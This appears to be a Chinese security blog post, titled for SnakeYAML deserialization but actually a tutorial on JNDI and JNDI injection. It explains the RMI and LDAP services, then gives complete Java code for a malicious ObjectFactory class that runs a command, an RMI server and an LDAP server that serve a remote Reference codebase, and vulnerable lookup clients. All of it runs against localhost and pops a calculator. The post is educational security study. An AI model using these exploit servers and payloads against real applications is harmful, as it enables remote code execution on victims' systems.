<!DOCTYPE HTML>
<html lang="zh-CN">


<head>
    <meta charset="utf-8">
    <meta name="keywords" content="SnakeYAML 反序列化, marin的小窝">
    <meta name="description" content="JNDI 注入JNDI 基础JNDI (java Naming and Directory Interface) 也就是 java 命名和目录接口，当程序定义了 JNDI 中的接口后，就可通过接口 API 访问系统的命名服务和目录服务
JN">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no">
    <meta name="renderer" content="webkit|ie-stand|ie-comp">
    <meta name="mobile-web-app-capable" content="yes">
    <meta name="format-detection" content="telephone=no">
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
    <meta name="referrer" content="no-referrer-when-downgrade">
    <!-- Global site tag (gtag.js) - Google Analytics -->


    <title>SnakeYAML 反序列化 | marin的小窝</title>
    <link rel="icon" type="image/jpeg" href="/favicon.jpg">
    


    <!-- bg-cover style     -->



<link rel="stylesheet" type="text/css" href="/libs/awesome/css/all.min.css">
<link rel="stylesheet" type="text/css" href="/libs/materialize/materialize.min.css">
<link rel="stylesheet" type="text/css" href="/libs/aos/aos.css">
<link rel="stylesheet" type="text/css" href="/libs/animate/animate.min.css">
<link rel="stylesheet" type="text/css" href="/libs/lightGallery/css/lightgallery.min.css">
<link rel="stylesheet" type="text/css" href="/css/matery.css">
<link rel="stylesheet" type="text/css" href="/css/my.css">
<link rel="stylesheet" type="text/css" href="/css/dark.css" media="none" onload="if(media!='all')media='all'">




    <link rel="stylesheet" href="/libs/tocbot/tocbot.css">
    <link rel="stylesheet" href="/css/post.css">




    
        <link rel="stylesheet" type="text/css" href="/css/reward.css">
    



    <script src="/libs/jquery/jquery-3.6.0.min.js"></script>

<meta name="generator" content="Hexo 8.1.1"></head>


<body>
    <header class="navbar-fixed">
    <nav id="headNav" class="bg-color nav-transparent">
        <div id="navContainer" class="nav-wrapper container">
            <div class="brand-logo">
                <a href="/" class="waves-effect waves-light">
                    
                    <img src="/medias/logo.png" class="logo-img" alt="LOGO">
                    
                    <span class="logo-span">marin的小窝</span>
                </a>
            </div>
            

<a href="#" data-target="mobile-nav" class="sidenav-trigger button-collapse"><i class="fas fa-bars"></i></a>
<ul class="right nav-menu">
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/" class="waves-effect waves-light">
      
      <i class="fas fa-home" style="zoom: 0.6;"></i>
      
      <span>主页</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/tags" class="waves-effect waves-light">
      
      <i class="fas fa-tags" style="zoom: 0.6;"></i>
      
      <span>标签</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/categories" class="waves-effect waves-light">
      
      <i class="fas fa-bookmark" style="zoom: 0.6;"></i>
      
      <span>类型</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/archives" class="waves-effect waves-light">
      
      <i class="fas fa-archive" style="zoom: 0.6;"></i>
      
      <span>归档</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/about" class="waves-effect waves-light">
      
      <i class="fas fa-user-circle" style="zoom: 0.6;"></i>
      
      <span>关于我</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/friends" class="waves-effect waves-light">
      
      <i class="fas fa-address-book" style="zoom: 0.6;"></i>
      
      <span>友链</span>
    </a>
    
  </li>
  
  <li>
    <a href="#searchModal" class="modal-trigger waves-effect waves-light">
      <i id="searchIcon" class="fas fa-search" title="搜索" style="zoom: 0.85;"></i>
    </a>
  </li>
  <li>
    <a href="javascript:;" class="waves-effect waves-light" onclick="switchNightMode()" title="深色/浅色模式" >
      <i id="sum-moon-icon" class="fas fa-sun" style="zoom: 0.85;"></i>
    </a>
  </li>
</ul>


<div id="mobile-nav" class="side-nav sidenav">

    <div class="mobile-head bg-color">
        
        <img src="/medias/logo.png" class="logo-img circle responsive-img">
        
        <div class="logo-name">marin的小窝</div>
        <div class="logo-desc">
            
            一个学习网安的小菜鸡
            
        </div>
    </div>

    <ul class="menu-list mobile-menu-list">
        
        <li class="m-nav-item">
	  
		<a href="/" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-home"></i>
			
			主页
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/tags" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-tags"></i>
			
			标签
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/categories" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-bookmark"></i>
			
			类型
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/archives" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-archive"></i>
			
			归档
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/about" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-user-circle"></i>
			
			关于我
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/friends" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-address-book"></i>
			
			友链
		</a>
          
        </li>
        
        
    </ul>
</div>


        </div>

        
    </nav>

</header>

    



<div class="bg-cover pd-header post-cover" style="background-image: url('https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/6b5su0brt3bvxzp5za1ixqw5k.jpg')">
    <div class="container" style="right: 0px;left: 0px;">
        <div class="row">
            <div class="col s12 m12 l12">
                <div class="brand">
                    <h1 class="description center-align post-title">SnakeYAML 反序列化</h1>
                </div>
            </div>
        </div>
    </div>
</div>




<main class="post-container content">

    
    <div class="row">
    <div id="main-content" class="col s12 m12 l9">
        <!-- 文章内容详情 -->
<div id="artDetail">
    <div class="card">
        <div class="card-content article-info">
            <div class="row tag-cate">
                <div class="col s7">
                    
                    <div class="article-tag">
                        
                            <a href="/tags/web/">
                                <span class="chip bg-color">web</span>
                            </a>
                        
                            <a href="/tags/java/">
                                <span class="chip bg-color">java</span>
                            </a>
                        
                    </div>
                    
                </div>
                <div class="col s5 right-align">
                    
                    <div class="post-cate">
                        <i class="fas fa-bookmark fa-fw icon-category"></i>
                        
                            <a href="/categories/WEB/" class="post-category">
                                WEB
                            </a>
                        
                    </div>
                    
                </div>
            </div>

            <div class="post-info">
                
                <div class="post-date info-break-policy">
                    <i class="far fa-calendar-minus fa-fw"></i>发布日期:&nbsp;&nbsp;
                    2026-01-16
                </div>
                

                

                

                

                
            </div>
        </div>
        <hr class="clearfix">

        
        <!-- 是否加载使用自带的 prismjs. -->
        <link rel="stylesheet" href="/libs/prism/prism.css">
        

        

        <div class="card-content article-card-content">
            <div id="articleContent">
                <h1 id="JNDI-注入"><a href="#JNDI-注入" class="headerlink" title="JNDI 注入"></a>JNDI 注入</h1><h2 id="JNDI-基础"><a href="#JNDI-基础" class="headerlink" title="JNDI 基础"></a>JNDI 基础</h2><p>JNDI (java Naming and Directory Interface) 也就是 java 命名和目录接口，当程序定义了 JNDI 中的接口后，就可通过接口 API 访问系统的<strong>命名服务</strong>和<strong>目录服务</strong></p>
<p>JNDI 中可以支持很多种服务：<code>LADP</code>​、<code>RMI</code>​、<code>DNS</code>​、<code>CORBA</code>等等<br>但是 JNDI 不会指定哪一个服务，而是通过 java 的 SPI 机制，这个会根据你的参数自动选择对应的服务并寻找对应的接口</p>
<table>
<thead>
<tr>
<th>协议</th>
<th>作用</th>
</tr>
</thead>
<tbody><tr>
<td>LDAP</td>
<td>轻量级目录访问协议，约定了 Client 和 Server 之间的信息交互格式、使用的端口号、认证方式等内容</td>
</tr>
<tr>
<td>RMI</td>
<td>Java 远程方法协议，该协议用于远程调用应用程序编程接口，使得客户机上运行的程序可以调用远程服务器上的对象</td>
</tr>
<tr>
<td>DNS</td>
<td>域名解析服务</td>
</tr>
<tr>
<td>CORBA</td>
<td>公告对象请求代理体系结构</td>
</tr>
</tbody></table>
<p>这里的命名服务和目录服务与常规的理解有点不一样</p>
<h3 id="命名服务"><a href="#命名服务" class="headerlink" title="命名服务"></a>命名服务</h3><p>通过名字查找对象</p>
<ul>
<li>DNS：通过域名查找实际的 IP 地址</li>
<li>文件系统：通过文件名定位到具体的文件</li>
</ul>
<p>在命名服务中有一些重要的概念</p>
<ul>
<li><code>Bindings</code> (绑定)：表示一个名称和对应对象之间的关联关系，又名称和对象组成</li>
<li><code>Context</code>​ (上下文)：代表命名服务中的一个命名空间，并提供了查找、绑定、解绑等方法处理名称和对象，<code>Context</code> 使得 JNDI 的命名空间可以类似文件系统</li>
<li><code>References</code> (引用)：表示某个名称对应对象的指针，命名服务利用这个来提供对对象的间接访问，能用工厂等方式重建一个对象，而不是直接返回一个对象</li>
</ul>
<h3 id="目录服务"><a href="#目录服务" class="headerlink" title="目录服务"></a>目录服务</h3><p>目录服务是命名服务的拓展，不仅可以将对象映射到名称上，还可以为这些对象提供关联的属性，通过这些属性可以过滤对象</p>
<p>‍</p>
<h3 id="JNDI-API-和-SPI"><a href="#JNDI-API-和-SPI" class="headerlink" title="JNDI API 和 SPI"></a>JNDI API 和 SPI</h3><p>JNDI 包含两个主要部分：API 和 SPI</p>
<h4 id="JNDI-API"><a href="#JNDI-API" class="headerlink" title="JNDI API"></a>JNDI API</h4><p>API 是应用编程接口，是 JNDI 提供给 Java 应用的一组标准类和接口，用来执行命名和目录服务</p>
<p><strong>命名服务</strong></p>
<ul>
<li><code>Context.lookup()</code>：根据名称查找一个对象</li>
<li><code>Context.bind()</code>：将一个名称绑定到一个对象</li>
<li><code>Context.rebind()</code>：重新绑定一个名称到一个对象</li>
<li><code>Context.unbind()</code>：在这个命名空间中解除这个名称和对象的绑定</li>
</ul>
<pre class="line-numbers language-java" data-language="java" data-start="1"><code class="language-java">&#x2F;&#x2F; 创建 JNDI 上下文
Context context &#x3D; new InitialContext();
&#x2F;&#x2F; 用名字查找数据库连接
DataSource dataSource &#x3D; (DataSource) context.lookup(&quot;jdbc&#x2F;MyDatabase&quot;);
&#x2F;&#x2F; 获取连接
Connection connection &#x3D; dataSource.getConnection();</code></pre>

<p><strong>目录服务</strong></p>
<ul>
<li><code>Context.getAttributes()</code>：获取对象的属性</li>
<li><code>Context.modifyAttributes()</code>：修改对象的属性</li>
<li><code>Contest.search()</code>：根据过滤条件搜索对象</li>
</ul>
<pre class="line-numbers language-java" data-language="java" data-start="1"><code class="language-java">&#x2F;&#x2F; 创建 JNDI 上下文
Context context &#x3D; new InitialContext();
&#x2F;&#x2F; 查找名字
Attributes atts &#x3D; context.getAttributes(&quot;name&quot;);
&#x2F;&#x2F; 获取相关属性
String title &#x3D; (String) attrs.get(&#39;title&#39;).get();
String department &#x3D; (String) attrs.get(&quot;department&quot;).get();</code></pre>

<p>‍</p>
<h4 id="JNDI-SPI"><a href="#JNDI-SPI" class="headerlink" title="JNDI SPI"></a>JNDI SPI</h4><p>SPI 是服务提供接口，是 JNDI 提供给 java 的一组抽象类和接口，用来开发特定的命名或目录服务</p>
<ul>
<li>命名服务提供者接口：需要实现 <code>javax.naming.spi.NamingManager</code> 类和相关接口，提供命名服务的具体实现</li>
<li>目录服务提供者接口：需要实现 <code>javax.naming.spi.DirContext</code> 及其子类，提供目录操作的实现</li>
</ul>
<p>SPI 允许不同的命名和目录服务集成到 JNDI 中，使得 JNDI 能够支持不用的服务，如：DNS、RMI 等<br>同时通过 SPI，能够拓展 JNDI 框架，不需要修改 JNDI API 就能够支持不同的服务</p>
<p>‍</p>
<h3 id="JNDI-案例"><a href="#JNDI-案例" class="headerlink" title="JNDI 案例"></a>JNDI 案例</h3><p>实现一个利用 JNDI 接口调用 RMI 的案例</p>
<p><strong>接口</strong></p>
<p><code>Remote</code>​ 接口，任何打算让客户端远程调用的接口都需要实现这个接口，并且所有在远程接口中定义的方法都要抛出 <code>java.rmi.RemoteException</code></p>
<pre class="line-numbers language-java" data-language="java" data-start="1"><code class="language-java">import java.rmi.Remote;
import java.rmi.RemoteException;

&#x2F;&#x2F; 实现了 Remote 接口
public interface Hello extends Remote &#123;
    String sayHello(String input) throws RemoteException;
&#125;</code></pre>

<p><strong>实现类</strong></p>
<p><code>UnicastRemoteObject</code> 是 RMI 提供的基础类，只有继承了这个类的对象才是 RMI 远程对象</p>
<pre class="line-numbers language-java" data-language="java" data-start="1"><code class="language-java">import java.rmi.RemoteException;
import java.rmi.server.UnicastRemoteObject;

public class HelloImpl extends UnicastRemoteObject implements Hello &#123;
    protected HelloImpl() throws RemoteException &#123;
    &#125;

    @Override
    public String sayHello(String input) throws RemoteException &#123;
        return input;
    &#125;
&#125;</code></pre>

<p><strong>RMI 服务端</strong></p>
<p>通过命名服务，实现了服务的暴露和发布</p>
<pre class="line-numbers language-java" data-language="java" data-start="1"><code class="language-java">import java.rmi.RemoteException;
import java.rmi.registry.LocateRegistry;
import java.rmi.registry.Registry;

public class RMIServer &#123;
    public static void main(String[] args) throws RemoteException &#123;
        &#x2F;&#x2F; 将 Hello 服务转化成 RMI 远程服务接口
		Hello skeleton &#x3D; new HelloImpl();
		&#x2F;&#x2F; 将 RMI 服务注册到 1099 端口
        Registry registry &#x3D; LocateRegistry.createRegistry(1099);
		&#x2F;&#x2F; 注册 Hello 服务，服务名为 Hello
        registry.rebind(&quot;Hello&quot;, skeleton);
    &#125;
&#125;</code></pre>

<p><strong>JNDI 客户端</strong></p>
<p><code>Context.INITIAL_CONTEXT_FACTORY</code> 指定了要使用哪个 SPI 实现 API ，这里指定的就是 RMI 服务</p>
<p><code>Context.PROVIDER_URL</code> 提供了 RMI 注册表的地址</p>
<pre class="line-numbers language-java" data-language="java" data-start="1"><code class="language-java">import javax.naming.Context;
import javax.naming.InitialContext;
import javax.naming.NamingException;
import java.rmi.RemoteException;
import java.util.Hashtable;

public class RMIClient &#123;
    public static void main(String[] args) throws NamingException, RemoteException &#123;
        &#x2F;&#x2F; 设置 JNDI 环境变量
		Hashtable&lt;String, String&gt; env &#x3D; new Hashtable&lt;&gt;();
        env.put(Context.INITIAL_CONTEXT_FACTORY,&quot;com.sun.jndi.rmi.registry.RegistryContextFactory&quot;);
        env.put(Context.PROVIDER_URL,&quot;rmi:&#x2F;&#x2F;localhost:1099&quot;);
		&#x2F;&#x2F; 初始化上下文
        Context ctx &#x3D; new InitialContext(env);
		&#x2F;&#x2F; 通过命名服务查找远程服务 Hello
        Hello hello &#x3D; (Hello) ctx.lookup(&quot;Hello&quot;);
        System.out.println(hello.sayHello(&quot;成功连接到RMI服务，并且实现&quot;));
    &#125;
&#125;</code></pre>

<p>最后先打开服务端，再启动客户端，就能实现</p>
<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/20251002150938.png" alt="image"></p>
<p>‍</p>
<h3 id="JNDI-Reference"><a href="#JNDI-Reference" class="headerlink" title="JNDI Reference"></a>JNDI Reference</h3><p><code>Reference</code> 是一种轻量级的、可序列化的数据结构，不包含一个对象，但是包含了重建一个目标对象需要的全部信息，一般是用来表示不直接存储在命名或目录系统中的对象的引用</p>
<p><code>Reference</code> 类主要有以下几个构造方法</p>
<pre class="line-numbers language-java" data-language="java" data-start="1"><code class="language-java">public Reference(String className,String factory,String factoryLocation)
public Reference(String className)
public Reference(String className,Vector&lt;RefAddr&gt; addrs,String factory, String factoryLocation)</code></pre>

<blockquote>
<p><code>className</code> 指定了引用的对象的全限定类名，告诉 JNDI 要加载哪个类</p>
<p><code>factory</code>​ 指定了用于构建对象的工厂类，这个类必须实现 <code>javax.naming.spi.ObjectFactory</code></p>
<p><code>addrs</code> 包含了一组引用地址，这些地址包含了重建对象的各种信息</p>
</blockquote>
<p>‍</p>
<h3 id="LDAP-协议"><a href="#LDAP-协议" class="headerlink" title="LDAP 协议"></a>LDAP 协议</h3><p>LDAP 是一种应用层协议，用于访问和维护分布式目录信息服务<br>主要是用来身份验证、信息查询、集中管理用户信息等<br>默认端口是 389</p>
<ul>
<li>目录服务：LDAP 的目录服务是按照树形结构存储和组织数据，是设计用来快速读取数据的数据库系统，但不适合频繁写入</li>
<li>条目( Entry )：是目录服务中的核心数据单元，一个条目由三个部分组成：对象类、属性和一个区别名( DN )，区别名是用来定义这个条目在整个目录树中的确切位置</li>
<li>对象类：对象类是条目的蓝图或者类型，每个条目必须由一个或多个对象类属性，定义了这个条目必须要包含哪些必须属性和可选属性</li>
<li>属性：属性是 LDAP 目录中信息的最小单元，以键值对的形式存在</li>
<li>区别名：DN 是条目的唯一标识符，由一系列用逗号分开的属性&#x2F;值对组成，描述了从当前条目到目录根的完整路径<br>每一个属性&#x2F;值对称为一个相对区别名 ( RDN )</li>
</ul>
<p>‍</p>
<h4 id="LDAP-协议操作"><a href="#LDAP-协议操作" class="headerlink" title="LDAP 协议操作"></a>LDAP 协议操作</h4><ol>
<li>绑定：客户端与 LDAP 服务器建立连接并进行身份验证</li>
<li>查询：客户端用来查询目录树中符合特定条件的条目</li>
<li>比较：检查某个条目中的某个属性值是否与给定值匹配</li>
<li>添加：向目录中添加新的条目</li>
<li>删除：删除指定的条目</li>
<li>修改：修改条目的属性值</li>
<li>修改 DN：修改条目的 DN，从而改变条目在目录树中的位置</li>
<li>解除绑定：客户端通知 LDAP 服务器结束会话，关闭连接</li>
</ol>
<p>‍</p>
<h3 id="JNDI-结构"><a href="#JNDI-结构" class="headerlink" title="JNDI 结构"></a>JNDI 结构</h3><p><code>javax.naming</code>​：主要用于命名操作，包含命名服务的类和接口，定义了 <code>Context</code>​ 接口和 <code>InitialContext</code> 类</p>
<p><code>javax.naming.directory</code>​：主要用于目录操作，定义了 <code>DirContext</code>​ 接口和 <code>InitialDirContext</code> 类</p>
<p><code>javax.naming.event</code>：目录事件通知，让应用监听命名和目录对象的变化</p>
<p><code>javax.naming.ldap</code>：LDAP 协议专用扩展</p>
<p><code>javax.naming.spi</code>：SPI 的实现</p>
<p>‍</p>
<h2 id="JNDI-注入-1"><a href="#JNDI-注入-1" class="headerlink" title="JNDI 注入"></a>JNDI 注入</h2><p>JNDI 注入的前提是能够操作客户端 lookup 方法或其他远程操作方法的参数</p>
<h3 id="JNDI-RMI"><a href="#JNDI-RMI" class="headerlink" title="JNDI + RMI"></a>JNDI + RMI</h3><p>我们需要在 RMI 服务器上绑定一个 <code>Reference</code> 类</p>
<p><strong>恶意类</strong></p>
<p><code>EvilClass</code>​ 就是远程类名，同时也还要作为工厂类名，所以这个类要实现 <code>javax.naming.spi.ObjectFactory</code> 接口</p>
<pre class="line-numbers language-java" data-language="java" data-start="1"><code class="language-java">import javax.naming.Context;
import javax.naming.Name;
import javax.naming.spi.ObjectFactory;
import java.io.IOException;
import java.util.Hashtable;

public class EvilClass implements ObjectFactory &#123;
    static&#123;
        try&#123;
            Runtime.getRuntime().exec(&quot;calc&quot;);
        &#125;catch (IOException e)&#123;
            throw new RuntimeException(e);
        &#125;

    &#125;
    @Override
    public Object getObjectInstance(Object obj, Name name, Context nameCtx, Hashtable&lt;?, ?&gt; environment) throws Exception &#123;
        return null;
    &#125;
&#125;</code></pre>

<p><strong>服务端代码</strong></p>
<pre class="line-numbers language-java" data-language="java" data-start="1"><code class="language-java">Reference reference &#x3D; new Reference(&quot;EvilClass&quot;, &quot;EvilClass&quot;, &quot;http:&#x2F;&#x2F;127.0.0.1:8002&#x2F;&quot;)</code></pre>

<p>攻击的核心 payload ，这里接收的是类名和工厂名，最后的地址是工厂类的网络地址，这个服务器上应该包含 <code>EvilClass</code>​ 字节码的 <code>.class</code> 文件</p>
<pre class="line-numbers language-java" data-language="java" data-start="1"><code class="language-java">ReferenceWrapper referenceWrapper &#x3D; new ReferenceWrapper(reference);</code></pre>

<p>前面说过，要让 RMI 适配基础类，就需要实现 <code>UnicastRemoteObject</code>​ ，<code>ReferenceWrapper</code>​ 包装后的类就会实现这个，将原本不具备远程能力的 <code>Reference</code> 对象适配成了 RMI 远程对象</p>
<ul>
<li>但是 <code>ReferenceWrapper</code> 在后续版本被移除了，需要额外引入 jar 包，这里用的版本是 8u65</li>
</ul>
<p>完整代码</p>
<pre class="line-numbers language-java" data-language="java" data-start="1"><code class="language-java">import com.sun.jndi.rmi.registry.ReferenceWrapper;
import javax.naming.NamingException;
import javax.naming.Reference;
import java.rmi.RemoteException;
import java.rmi.registry.LocateRegistry;
import java.rmi.registry.Registry;

public class JndiRmiServer &#123;
    public static void main(String[] args) throws NamingException, RemoteException &#123;
        Reference reference &#x3D; new Reference(&quot;EvilClass&quot;, &quot;EvilClass&quot;, &quot;http:&#x2F;&#x2F;127.0.0.1:8002&#x2F;&quot;);
        ReferenceWrapper referenceWrapper &#x3D; new ReferenceWrapper(reference);
        &#x2F;&#x2F; 将 RMI 服务注册到 1099 端口
        Registry registry &#x3D; LocateRegistry.createRegistry(1099);
        &#x2F;&#x2F; 绑定 Reference 对象
        registry.rebind(&quot;EvilClass&quot;, referenceWrapper);
    &#125;
&#125;</code></pre>

<p>‍</p>
<p><strong>客户端</strong></p>
<p>这里踩了几个坑，因为前面写的不是全限定包名，所以如果不要远程访问的话，就需要将代码放到 java 路径下</p>
<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/20251002171541.png" alt="image"></p>
<p>如果是要远程访问，就将这些文件移除，并且文件中不能有包名，然后起一个服务</p>
<pre class="line-numbers language-cmd" data-language="cmd" data-start="1"><code class="language-cmd">python -m http.server 8002</code></pre>

<p>可以看到成功访问了，并且实现了弹出计算机的功能</p>
<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/20251002172105.png" alt="image"></p>
<pre class="line-numbers language-java" data-language="java" data-start="1"><code class="language-java">import javax.naming.Context;
import javax.naming.InitialContext;
import javax.naming.NamingException;
import javax.naming.Reference;
import java.rmi.RemoteException;

public class RMIClient &#123;
    public static void main(String[] args) throws NamingException, RemoteException &#123;

        Context ctx &#x3D; new InitialContext();

        Object lookup &#x3D;  ctx.lookup(&quot;rmi:&#x2F;&#x2F;127.0.0.1:1099&#x2F;EvilClass&quot;);
    &#125;
&#125;</code></pre>

<p>‍</p>
<p>‍</p>
<h3 id="JNDI-LDAP"><a href="#JNDI-LDAP" class="headerlink" title="JNDI + LDAP"></a>JNDI + LDAP</h3><p>利用这个也需要 Java 开启一个 LDAP 服务器，需要的依赖如下</p>
<pre class="line-numbers language-markup" data-language="markup" data-start="1"><code class="language-markup">&lt;dependency&gt;
    &lt;groupId&gt;com.unboundid&lt;&#x2F;groupId&gt;
    &lt;artifactId&gt;unboundid-ldapsdk&lt;&#x2F;artifactId&gt;
    &lt;version&gt;6.0.7&lt;&#x2F;version&gt;
&lt;&#x2F;dependency&gt;</code></pre>

<p>LDAP 服务端代码如下</p>
<pre class="line-numbers language-java" data-language="java" data-start="1"><code class="language-java">import com.unboundid.ldap.listener.InMemoryDirectoryServer;
import com.unboundid.ldap.listener.InMemoryDirectoryServerConfig;
import com.unboundid.ldap.listener.InMemoryListenerConfig;
import com.unboundid.ldap.listener.interceptor.InMemoryInterceptedSearchResult;
import com.unboundid.ldap.listener.interceptor.InMemoryOperationInterceptor;
import com.unboundid.ldap.sdk.Entry;
import com.unboundid.ldap.sdk.LDAPException;
import com.unboundid.ldap.sdk.LDAPResult;
import com.unboundid.ldap.sdk.ResultCode;
import javax.net.ServerSocketFactory;
import javax.net.SocketFactory;
import javax.net.ssl.SSLSocketFactory;
import java.net.InetAddress;
import java.net.MalformedURLException;
import java.net.URL;
import java.net.UnknownHostException;

public class LdapServer &#123;
    private static final String LDAP_BASE &#x3D; &quot;dc&#x3D;example,dc&#x3D;com&quot;;
    public static void main(String[] args) throws LDAPException, UnknownHostException, MalformedURLException &#123;
        String url &#x3D; &quot;http:&#x2F;&#x2F;127.0.0.1:8002&#x2F;#EvilClass&quot;;
        int port &#x3D; 8003;
        InMemoryDirectoryServerConfig config &#x3D; new InMemoryDirectoryServerConfig(LDAP_BASE);
        config.setListenerConfigs(new InMemoryListenerConfig(
                &quot;listen&quot;,
                InetAddress.getByName(&quot;0.0.0.0&quot;),
                port,
                ServerSocketFactory.getDefault(),
                SocketFactory.getDefault(),
                (SSLSocketFactory) SSLSocketFactory.getDefault()));

        config.addInMemoryOperationInterceptor(new OperationInterceptor(new URL(url)));
        InMemoryDirectoryServer ds &#x3D; new InMemoryDirectoryServer(config);
        System.out.println(&quot;Listening on 0.0.0.0:&quot; + port);
        ds.startListening();
    &#125;
    public static class OperationInterceptor extends InMemoryOperationInterceptor &#123;
        private URL codebase;
        public OperationInterceptor(URL url) &#123;
            this.codebase &#x3D; url;
        &#125;
        @Override
        public void processSearchResult(InMemoryInterceptedSearchResult result)&#123;
            String base &#x3D; result.getRequest().getBaseDN();
            Entry e &#x3D; new  Entry(base);
            try &#123;
                sendResult(result,base,e);
            &#125; catch (MalformedURLException ex) &#123;
                throw new RuntimeException(ex);
            &#125; catch (LDAPException ex) &#123;
                throw new RuntimeException(ex);
            &#125;

        &#125;

        private void sendResult(InMemoryInterceptedSearchResult result,String base,Entry e) throws MalformedURLException, LDAPException &#123;
            URL turl &#x3D; new URL(this.codebase,this.codebase.getRef().replace(&#39;.&#39;,&#39;&#x2F;&#39;).concat(&quot;.class&quot;));
            System.out.println(&quot;Send LDAP reference result for &quot;+ base + &quot;redirecting to&quot; + turl);
            String cbstr &#x3D; this.codebase.toString();
            int refPos &#x3D; cbstr.indexOf(&#39;#&#39;);
            if(refPos &gt; 0)&#123;
                cbstr &#x3D; cbstr.substring(0, refPos);
            &#125;
            e.addAttribute(&quot;javaClassName&quot;,&quot;Exploit&quot;);
            e.addAttribute(&quot;javaCodeBase&quot;,cbstr);
            e.addAttribute(&quot;objectClass&quot;,&quot;javaNamingReference&quot;);
            e.addAttribute(&quot;javaFactory&quot;,this.codebase.getRef());
            result.sendSearchEntry(e);
            result.setResult(new LDAPResult(0, ResultCode.SUCCESS));
        &#125;
    &#125;
&#125;</code></pre>

<p>客户端代码</p>
<pre class="line-numbers language-java" data-language="java" data-start="1"><code class="language-java">import javax.naming.InitialContext;
import javax.naming.NamingException;

public class LdapClient &#123;
    public static void main(String[] args) throws NamingException &#123;
        InitialContext context &#x3D; new InitialContext();
        context.lookup(&quot;ldap:&#x2F;&#x2F;127.0.0.1:8003&#x2F;EvilClass&quot;);
    &#125;
&#125;</code></pre>

<p>‍</p>
<p>‍</p>
<p>参考</p>
<p><a target="_blank" rel="noopener" href="https://changeyourway.github.io/2024/09/06/Java%20%E5%AE%89%E5%85%A8/%E6%BC%8F%E6%B4%9E%E7%AF%87-JNDI%E6%B3%A8%E5%85%A5%E8%AF%A6%E8%A7%A3/#LDAP-%E5%8D%8F%E8%AE%AE">漏洞篇 - JNDI 注入详解 - 妙尽璇机</a></p>

                
            </div>
            <hr/>

            

    <div class="reprint" id="reprint-statement">
        
            <div class="reprint__author">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-user">
                        文章作者:
                    </i>
                </span>
                <span class="reprint-info">
                    <a href="/about" rel="external nofollow noreferrer">Marin</a>
                </span>
            </div>
            <div class="reprint__type">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-link">
                        文章链接:
                    </i>
                </span>
                <span class="reprint-info">
                    <a href="https://wwwmarin.xyz/2026/01/16/jndi-zhu-ru/">https://wwwmarin.xyz/2026/01/16/jndi-zhu-ru/</a>
                </span>
            </div>
            <div class="reprint__notice">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-copyright">
                        版权声明:
                    </i>
                </span>
                <span class="reprint-info">
                    本博客所有文章除特別声明外，均采用
                    <a href="https://creativecommons.org/licenses/by/4.0/deed.zh" rel="external nofollow noreferrer" target="_blank">CC BY 4.0</a>
                    许可协议。转载请注明来源
                    <a href="/about" target="_blank">Marin</a>
                    !
                </span>
            </div>
        
    </div>

    <script async defer>
      document.addEventListener("copy", function (e) {
        let toastHTML = '<span>复制成功，请遵循本文的转载规则</span><button class="btn-flat toast-action" onclick="navToReprintStatement()" style="font-size: smaller">查看</a>';
        M.toast({html: toastHTML})
      });

      function navToReprintStatement() {
        $("html, body").animate({scrollTop: $("#reprint-statement").offset().top - 80}, 800);
      }
    </script>



            <div class="tag_share" style="display: block;">
                <div class="post-meta__tag-list" style="display: inline-block;">
                    
                        <div class="article-tag">
                            
                                <a href="/tags/web/">
                                    <span class="chip bg-color">web</span>
                                </a>
                            
                                <a href="/tags/java/">
                                    <span class="chip bg-color">java</span>
                                </a>
                            
                        </div>
                    
                </div>
                <div class="post_share" style="zoom: 80%; width: fit-content; display: inline-block; float: right; margin: -0.15rem 0;">
                    <link rel="stylesheet" type="text/css" href="/libs/share/css/share.min.css">
<div id="article-share">

    
    <div class="social-share" data-sites="twitter,facebook,google,qq,qzone,wechat,weibo,douban,linkedin" data-wechat-qrcode-helper="<p>微信扫一扫即可分享！</p>"></div>
    <script src="/libs/share/js/social-share.min.js"></script>
    

    

</div>

                </div>
            </div>
            
                <div id="reward">
    <a href="#rewardModal" class="reward-link modal-trigger btn-floating btn-medium waves-effect waves-light red">赏</a>

    <!-- Modal Structure -->
    <div id="rewardModal" class="modal">
        <div class="modal-content">
            <a class="close modal-close"><i class="fas fa-times"></i></a>
            <h4 class="reward-title">你的赏识是我前进的动力</h4>
            <div class="reward-content">
                <div class="reward-tabs">
                    <ul class="tabs row">
                        <li class="tab col s6 alipay-tab waves-effect waves-light"><a href="#alipay">支付宝</a></li>
                        <li class="tab col s6 wechat-tab waves-effect waves-light"><a href="#wechat">微 信</a></li>
                    </ul>
                    <div id="alipay">
                        <img src="/medias/reward/alipay.jpg" class="reward-img" alt="支付宝打赏二维码">
                    </div>
                    <div id="wechat">
                        <img src="/medias/reward/wechat.png" class="reward-img" alt="微信打赏二维码">
                    </div>
                </div>
